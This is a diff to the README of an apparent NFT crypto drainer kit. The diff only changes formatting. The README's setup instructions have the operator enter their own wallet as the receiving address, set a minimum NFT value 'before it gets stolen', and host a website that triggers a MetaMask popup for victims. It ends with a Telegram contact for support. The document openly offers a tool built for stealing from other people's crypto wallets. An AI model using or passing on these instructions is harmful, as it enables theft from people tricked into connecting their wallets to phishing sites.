xxxKEKxxx/NFT-Crypto-Drainer/README.md

 ## `☁️ Important (PLEASE READ BEFORE):`

 - Lines after **"const drainNftsInfo"** will be used for the NFT drainer.
-- Edit lines : nftReceiveAddress: "YOUR WALLET", replace YOUR WALLET with your ETH wallet address.
+- Edit lines : nftReceiveAddress: **"YOUR WALLET"**, replace this your ETH wallet address.
-- Line "minValue: 0.2," is the minimum value of a NFT before it gets stolen.
+- Line **"minValue: 0.2,"** is the minimum value of a NFT before it gets stolen.
-Exemple : If you change this value to 1, the script will only steal NFTs that have a value higher to 1.
+Exemple : If you change this value to **1**, the script will only steal NFTs that have a value higher to **1**.
-### - To see the metamask popup, you must host the website
+### ➢ To see the metamask popup, you must host the website

 To get instant support, contact me on [Telegram](https://t.me/zentoh)